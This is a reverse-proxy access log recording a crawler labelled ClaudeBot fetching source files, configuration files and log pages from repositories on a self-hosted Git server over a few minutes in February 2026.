"/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" [Client 216.73.216.188] [Length 10759] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css/style.css" [Client 216.73.216.188] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" [Client 216.73.216.188] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js" [Client 216.73.216.188] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json?display=source" [Client 216.73.216.188] [Length 11685] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js?display=source" [Client 216.73.216.188] [Length 14922] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13141] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:31 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/assets/css/style.css" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" [Client 216.73.216.188] [Length 14804] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js?display=rendered" [Client 216.73.216.188] [Length 10936] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:31 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/assets/js/script.js" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9963] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15541] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css/style.css" [Client 216.73.216.188] [Length 13122] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js?display=source" [Client 216.73.216.188] [Length 12824] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 1372] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" [Client 216.73.216.188] [Length 11520] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md?display=source" [Client 216.73.216.188] [Length 11758] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" [Client 216.73.216.188] [Length 21807] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log?display=source" [Client 216.73.216.188] [Length 10989] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11869] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" [Client 216.73.216.188] [Length 11076] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services" [Client 216.73.216.188] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log?display=source" [Client 216.73.216.188] [Length 14420] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16465] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 10311] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 11300] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14191] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" [Client 216.73.216.188] [Length 13921] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js/script.js?display=rendered" [Client 216.73.216.188] [Length 10989] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13869] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11284] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/templates/index.html?display=rendered" [Client 216.73.216.188] [Length 10973] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets" [Client 216.73.216.188] [Length 10362] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12763] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" [Client 216.73.216.188] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2?display=source" [Client 216.73.216.188] [Length 31304] [Gzip 6.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log?display=source" [Client 216.73.216.188] [Length 27658] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 9956] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md?display=source" [Client 216.73.216.188] [Length 11762] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 11885] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" [Client 216.73.216.188] [Length 11345] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" [Client 216.73.216.188] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11870] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" [Client 216.73.216.188] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log?display=source" [Client 216.73.216.188] [Length 10988] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json?display=source" [Client 216.73.216.188] [Length 12791] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13218] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/proxy-host-2_error.log" [Client 216.73.216.188] [Length 20991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:34:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:35:07 +0000] - 200 200 - GET https 